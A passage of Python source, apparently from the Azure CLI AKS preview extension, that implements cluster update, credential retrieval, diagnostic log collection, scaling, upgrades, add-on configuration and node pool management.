min_count=None, max_count=None, no_wait=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_managed_outbound_ipv6_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
nat_gateway_managed_outbound_ip_count=None,
nat_gateway_idle_timeout=None,
api_server_authorized_ip_ranges=None,
enable_pod_security_policy=False,
disable_pod_security_policy=False,
attach_acr=None,
detach_acr=None,
uptime_sla=False,
no_uptime_sla=False,
enable_aad=False,
aad_tenant_id=None,
aad_admin_group_object_ids=None,
enable_ahub=False,
disable_ahub=False,
aks_custom_headers=None,
auto_upgrade_channel=None,
enable_managed_identity=False,
assign_identity=None,
assign_kubelet_identity=None,
enable_pod_identity=False,
enable_pod_identity_with_kubenet=False,
disable_pod_identity=False,
# NOTE: for workload identity flags, we need to know if it's set to True/False or not set (None)
enable_workload_identity=None,
disable_workload_identity=None,
enable_secret_rotation=False,
disable_secret_rotation=False,
rotation_poll_interval=None,
enable_disk_driver=None,
disable_disk_driver=None,
enable_file_driver=None,
disable_file_driver=None,
enable_snapshot_controller=None,
disable_snapshot_controller=None,
disable_local_accounts=False,
enable_local_accounts=False,
enable_public_fqdn=False,
disable_public_fqdn=False,
yes=False,
tags=None,
nodepool_labels=None,
windows_admin_password=None,
enable_azure_rbac=False,
disable_azure_rbac=False,
enable_windows_gmsa=False,
gmsa_dns_server=None,
gmsa_root_domain_name=None,
enable_oidc_issuer=False,
http_proxy_config=None,
enable_azure_keyvault_kms=False,
azure_keyvault_kms_key_id=None,
enable_apiserver_vnet_integration=False,
apiserver_subnet_id=None):
# DO NOT MOVE: get all the original parameters and save them as a dictionary
raw_parameters = locals()
from azure.cli.command_modules.acs._consts import DecoratorEarlyExitException
from azure.cli.command_modules.acs.decorator import AKSParamDict
from .decorator import AKSPreviewUpdateDecorator
# decorator pattern
aks_update_decorator = AKSPreviewUpdateDecorator(
cmd=cmd,
client=client,
raw_parameters=AKSParamDict(raw_parameters),
resource_type=CUSTOM_MGMT_AKS_PREVIEW,
)
try:
# update mc profile
mc = aks_update_decorator.update_mc_preview_profile()
except DecoratorEarlyExitException:
# exit gracefully
return None
# send request to update the real managed cluster
return aks_update_decorator.update_mc_preview(mc)
# pylint: disable=unused-argument
def aks_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def aks_get_credentials(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
admin=False,
user='clusterUser',
path=os.path.join(os.path.expanduser(
'~'), '.kube', 'config'),
overwrite_existing=False,
context_name=None,
public_fqdn=False,
credential_format=None):
credentialResults = None
serverType = None
if public_fqdn:
serverType = 'public'
if credential_format:
credential_format = credential_format.lower()
if admin:
raise InvalidArgumentValueError("--format can only be specified when requesting clusterUser credential.")
if admin:
credentialResults = client.list_cluster_admin_credentials(
resource_group_name, name, serverType)
else:
if user.lower() == 'clusteruser':
credentialResults = client.list_cluster_user_credentials(
resource_group_name, name, serverType, credential_format)
elif user.lower() == 'clustermonitoringuser':
credentialResults = client.list_cluster_monitoring_user_credentials(
resource_group_name, name, serverType)
else:
raise CLIError("The user is invalid.")
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(
encoding='UTF-8')
_print_or_merge_credentials(
path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
# pylint: disable=line-too-long
def aks_kollect(cmd, # pylint: disable=too-many-statements,too-many-locals
client,
resource_group_name,
name,
storage_account=None,
sas_token=None,
container_logs=None,
kube_objects=None,
node_logs=None):
colorama.init()
mc = client.get(resource_group_name, name)
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
storage_account_id = None
if storage_account is None:
print("No storage account specified. Try getting storage account from diagnostic settings")
storage_account_id = get_storage_account_from_diag_settings(
cmd.cli_ctx, resource_group_name, name)
if storage_account_id is None:
raise CLIError(
"A storage account must be specified, since there isn't one in the diagnostic settings.")
from msrestazure.tools import (is_valid_resource_id, parse_resource_id,
resource_id)
if storage_account_id is None:
if not is_valid_resource_id(storage_account):
storage_account_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Storage', type='storageAccounts',
name=storage_account
)
else:
storage_account_id = storage_account
if is_valid_resource_id(storage_account_id):
try:
parsed_storage_account = parse_resource_id(storage_account_id)
except CloudError as ex:
raise CLIError(ex.message)
else:
raise CLIError("Invalid storage account id %s" % storage_account_id)
storage_account_name = parsed_storage_account['name']
readonly_sas_token = None
if sas_token is None:
storage_client = cf_storage(
cmd.cli_ctx, parsed_storage_account['subscription'])
storage_account_keys = storage_client.storage_accounts.list_keys(parsed_storage_account['resource_group'],
storage_account_name)
kwargs = {
'account_name': storage_account_name,
'account_key': storage_account_keys.keys[0].value
}
cloud_storage_client = cloud_storage_account_service_factory(
cmd.cli_ctx, kwargs)
sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rwdlacup',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rl',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = readonly_sas_token.strip('?')
print()
print('This will deploy a daemon set to your cluster to collect logs and diagnostic information and '
f'save them to the storage account '
f'{colorama.Style.BRIGHT}{colorama.Fore.GREEN}{storage_account_name}{colorama.Style.RESET_ALL} as '
f'outlined in {format_hyperlink("http://aka.ms/AKSPeriscope")}.')
print()
print('If you share access to that storage account to Azure support, you consent to the terms outlined'
f' in {format_hyperlink("http://aka.ms/DiagConsent")}.')
print()
if not prompt_y_n('Do you confirm?', default="n"):
return
print()
print("Getting credentials for cluster %s " % name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=True, path=temp_kubeconfig_path)
print()
print("Starts collecting diag info for cluster %s " % name)
# Form containerName from fqdn, as it was previously jsut the location of code is changed.
# https://docs.microsoft.com/en-us/rest/api/storageservices/naming-and-referencing-containers--blobs--and-metadata#container-names
maxContainerNameLength = 63
fqdn = mc.fqdn if mc.fqdn is not None else mc.private_fqdn
normalized_container_name = fqdn.replace('.', '-')
len_of_container_name = normalized_container_name.index("-hcp-")
if len_of_container_name == -1:
len_of_container_name = maxContainerNameLength
container_name = normalized_container_name[:len_of_container_name]
sas_token = sas_token.strip('?')
deployment_yaml = _read_periscope_yaml()
deployment_yaml = deployment_yaml.replace(
"# <accountName, string>", storage_account_name)
deployment_yaml = deployment_yaml.replace("# <saskey, base64 encoded>",
(base64.b64encode(bytes("?" + sas_token, 'ascii'))).decode('ascii'))
deployment_yaml = deployment_yaml.replace(
"# <containerName, string>", container_name)
yaml_lines = deployment_yaml.splitlines()
for index, line in enumerate(yaml_lines):
if "DIAGNOSTIC_CONTAINERLOGS_LIST" in line and container_logs is not None:
yaml_lines[index] = line + ' ' + container_logs
if "DIAGNOSTIC_KUBEOBJECTS_LIST" in line and kube_objects is not None:
yaml_lines[index] = line + ' ' + kube_objects
if "DIAGNOSTIC_NODELOGS_LIST" in line and node_logs is not None:
yaml_lines[index] = line + ' ' + node_logs
deployment_yaml = '\n'.join(yaml_lines)
fd, temp_yaml_path = tempfile.mkstemp()
temp_yaml_file = os.fdopen(fd, 'w+t')
try:
temp_yaml_file.write(deployment_yaml)
temp_yaml_file.flush()
temp_yaml_file.close()
try:
print()
print("Cleaning up aks-periscope resources if existing")
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"serviceaccount,configmap,daemonset,secret",
"--all", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding-view", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRole",
"aks-periscope-role", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"--all",
"apd", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.DEVNULL)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"CustomResourceDefinition",
"diagnostics.aks-periscope.azure.github.com", "--ignore-not-found"],
stderr=subprocess.STDOUT)
print()
print("Deploying aks-periscope")
subprocess.check_output(["kubectl", "--kubeconfig", temp_kubeconfig_path, "apply", "-f",
temp_yaml_path, "-n", "aks-periscope"], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
finally:
os.remove(temp_yaml_path)
print()
token_in_storage_account_url = readonly_sas_token if readonly_sas_token is not None else sas_token
log_storage_account_url = f"https://{storage_account_name}.blob.core.windows.net/" \
f"{_trim_fqdn_name_containing_hcp(container_name)}?{token_in_storage_account_url}"
print(f'{colorama.Fore.GREEN}Your logs are being uploaded to storage account {format_bright(storage_account_name)}')
print()
print(f'You can download Azure Storage Explorer here '
f'{format_hyperlink("https://azure.microsoft.com/en-us/features/storage-explorer/")}'
f' to check the logs by adding the storage account using the following URL:')
print(f'{format_hyperlink(log_storage_account_url)}')
print()
if not prompt_y_n('Do you want to see analysis results now?', default="n"):
print(f"You can run 'az aks kanalyze -g {resource_group_name} -n {name}' "
f"anytime to check the analysis results.")
else:
display_diagnostics_report(temp_kubeconfig_path)
def _read_periscope_yaml():
curr_dir = os.path.dirname(os.path.realpath(__file__))
periscope_yaml_file = os.path.join(
curr_dir, "deploymentyaml", "aks-periscope.yaml")
yaml_file = open(periscope_yaml_file, "r")
data_loaded = yaml_file.read()
return data_loaded
def aks_kanalyze(cmd, client, resource_group_name, name):
colorama.init()
client.get(resource_group_name, name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=True, path=temp_kubeconfig_path)
display_diagnostics_report(temp_kubeconfig_path)
def aks_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
node_count,
nodepool_name="",
no_wait=False):
instance = client.get(resource_group_name, name)
_fill_defaults_for_pod_identity_profile(instance.pod_identity_profile)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
raise CLIError('There are more than one node pool in the cluster. '
'Please specify nodepool name or use az aks nodepool command to scale node pool')
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
if agent_profile.enable_auto_scaling:
raise CLIError(
"Cannot scale cluster autoscaler enabled node pool.")
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP profile because otherwise validation complains
instance.service_principal_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
def aks_upgrade(cmd, # pylint: disable=unused-argument, too-many-return-statements
client,
resource_group_name,
name,
kubernetes_version='',
control_plane_only=False,
no_wait=False,
node_image_only=False,
aks_custom_headers=None,
yes=False):
msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
if not yes and not prompt_y_n(msg, default="n"):
return None
instance = client.get(resource_group_name, name)
_fill_defaults_for_pod_identity_profile(instance.pod_identity_profile)
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
msg = "This node image upgrade operation will run across every node pool in the cluster " \
"and might take a while. Do you wish to continue?"
if not yes and not prompt_y_n(msg, default="n"):
return None
# This only provide convenience for customer at client side so they can run az aks upgrade to upgrade all
# nodepools of a cluster. The SDK only support upgrade single nodepool at a time.
for agent_pool_profile in instance.agent_pool_profiles:
if vmas_cluster:
raise CLIError('This cluster is not using VirtualMachineScaleSets. Node image upgrade only operation '
'can only be applied on VirtualMachineScaleSets cluster.')
agent_pool_client = cf_agent_pools(cmd.cli_ctx)
_upgrade_single_nodepool_image_version(
True, agent_pool_client, resource_group_name, name, agent_pool_profile.name, None)
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
agent_profile.creation_data = None
# null out the SP profile because otherwise validation complains
instance.service_principal_profile = None
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance, headers=headers)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name, snapshot_id=None):
headers = {}
if snapshot_id:
headers["AKSSnapshotId"] = snapshot_id
return sdk_no_wait(no_wait, client.begin_upgrade_node_image_version, resource_group_name, cluster_name, nodepool_name, headers=headers)
def _handle_addons_args(cmd, # pylint: disable=too-many-statements
addons_str,
subscription_id,
resource_group_name,
addon_profiles=None,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
aci_subnet_name=None,
vnet_subnet_id=None,
enable_secret_rotation=False,
rotation_poll_interval=None,):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles[CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = sanitize_loganalytics_ws_resource_id(
workspace_resource_id)
addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True,
config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id,
CONST_MONITORING_USING_AAD_MSI_AUTH: enable_msi_auth_for_monitoring})
addons.remove('monitoring')
elif workspace_resource_id:
raise CLIError(
'"--workspace-resource-id" requires "--enable-addons monitoring".')
if 'azure-policy' in addons:
addon_profiles[CONST_AZURE_POLICY_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('azure-policy')
if 'gitops' in addons:
addon_profiles['gitops'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('gitops')
if 'ingress-appgw' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
addons.remove('ingress-appgw')
if 'open-service-mesh' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
addon_profiles[CONST_OPEN_SERVICE_MESH_ADDON_NAME] = addon_profile
addons.remove('open-service-mesh')
if 'azure-keyvault-secrets-provider' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={
CONST_SECRET_ROTATION_ENABLED: "false", CONST_ROTATION_POLL_INTERVAL: "2m"})
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
if rotation_poll_interval is not None:
addon_profile.config[CONST_ROTATION_POLL_INTERVAL] = rotation_poll_interval
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addons.remove('azure-keyvault-secrets-provider')
if 'confcom' in addons:
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
addons.remove('confcom')
if 'virtual-node' in addons:
if not aci_subnet_name or not vnet_subnet_id:
raise CLIError(
'"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".')
# TODO: how about aciConnectorwindows, what is its addon name?
os_type = 'Linux'
addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + os_type] = ManagedClusterAddonProfile(
enabled=True,
config={CONST_VIRTUAL_NODE_SUBNET_NAME: aci_subnet_name}
)
addons.remove('virtual-node')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
fqdn_subdomain=None,
location=None,
name=None):
file_name_aks = 'aksServicePrincipal.json'
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(
subscription_id, file_name=file_name_aks)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
if dns_name_prefix:
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(
salt, dns_name_prefix, location)
else:
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(
salt, fqdn_subdomain, location)
service_principal = _build_service_principal(
rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError(
'--client-secret is required if --service-principal is specified')
store_acs_service_principal(
subscription_id, client_secret, service_principal, file_name=file_name_aks)
return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError(
'Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError(
'value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError(
'node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError(
'min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
def _create_client_secret():
# Add a special character to satsify AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(
os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id, # pylint: disable=unused-argument
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(
cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(
parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(
cli_ctx, client_id, registry.id, detach)
return
# Check if the ACR exists by name accross all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(
cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError(
"ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def aks_agentpool_show(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, # pylint: disable=unused-argument,too-many-locals
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
kubernetes_version=None,
node_zones=None,
zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
pod_subnet_id=None,
ppg=None,
max_pods=0,
os_type=None,
os_sku=None,
enable_fips_image=False,
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
scale_down_mode=CONST_SCALE_DOWN_MODE_DELETE,
node_taints=None,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float('nan'),
labels=None,
max_surge=None,
mode="User",
aks_custom_headers=None,
kubelet_config=None,
linux_os_config=None,
enable_encryption_at_host=False,
enable_ultra_ssd=False,
workload_runtime=None,
gpu_instance_profile=None,
snapshot_id=None,
host_group_id=None,
crg_id=None,
message_of_the_day=None,
no_wait=False):
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
upgradeSettings = AgentPoolUpgradeSettings()
taints_array = []
creationData = None
if snapshot_id:
snapshot = _get_snapshot(cmd.cli_ctx, snapshot_id)
if not kubernetes_version:
kubernetes_version = snapshot.kubernetes_version
if not os_type:
os_type = snapshot.os_type
if not os_sku:
os_sku = snapshot.os_sku
if not node_vm_size:
node_vm_size = snapshot.vm_size
creationData = CreationData(
source_resource_id=snapshot_id
)
if not os_type:
os_type = "Linux"
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError(
'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type == "Windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
if max_surge:
upgradeSettings.max_surge = max_surge
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
os_sku=os_sku,
enable_fips=enable_fips_image,
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
pod_subnet_id=pod_subnet_id,
proximity_placement_group_id=ppg,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=node_zones,
enable_node_public_ip=enable_node_public_ip,
node_public_ip_prefix_id=node_public_ip_prefix_id,
node_taints=taints_array,
scale_set_priority=priority,
scale_down_mode=scale_down_mode,
upgrade_settings=upgradeSettings,
enable_encryption_at_host=enable_encryption_at_host,
enable_ultra_ssd=enable_ultra_ssd,
mode=mode,
workload_runtime=workload_runtime,
gpu_instance_profile=gpu_instance_profile,
creation_data=creationData,
host_group_id=host_group_id,
capacity_reservation_group_id=crg_id
)
if priority == CONST_SCALE_SET_PRIORITY_SPOT:
agent_pool.scale_set_eviction_policy = eviction_policy
if isnan(spot_max_price):
spot_max_price = -1
agent_pool.spot_max_price = spot_max_price
_check_cluster_autoscaler_flag(
enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool.os_disk_type = node_osdisk_type
if kubelet_config:
agent_pool.kubelet_config = _get_kubelet_config(kubelet_config)
if linux_os_config:
agent_pool.linux_os_config = _get_linux_os_config(linux_os_config)
if message_of_the_day:
agent_pool.message_of_the_day = _get_message_of_the_day(
message_of_the_day)
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool, headers=headers)
def aks_agentpool_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if instance.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
if new_node_count == instance.count:
raise CLIError(
"The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
kubernetes_version='',
no_wait=False,
node_image_only=False,
max_surge=None,
aks_custom_headers=None,
snapshot_id=None):
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version.'
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
return _upgrade_single_nodepool_image_version(no_wait,
client,
resource_group_name,
cluster_name,
nodepool_name,
snapshot_id)
creationData = None
if snapshot_id:
snapshot = _get_snapshot(cmd.cli_ctx, snapshot_id)
if not kubernetes_version and not node_image_only:
kubernetes_version = snapshot.kubernetes_version
creationData = CreationData(
source_resource_id=snapshot_id
)
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
instance.creation_data = creationData
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance, headers=headers)
def aks_agentpool_get_upgrade_profile(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
return client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_update(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
scale_down_mode=None,
min_count=None, max_count=None,
max_surge=None,
mode=None,
labels=None,
node_taints=None,
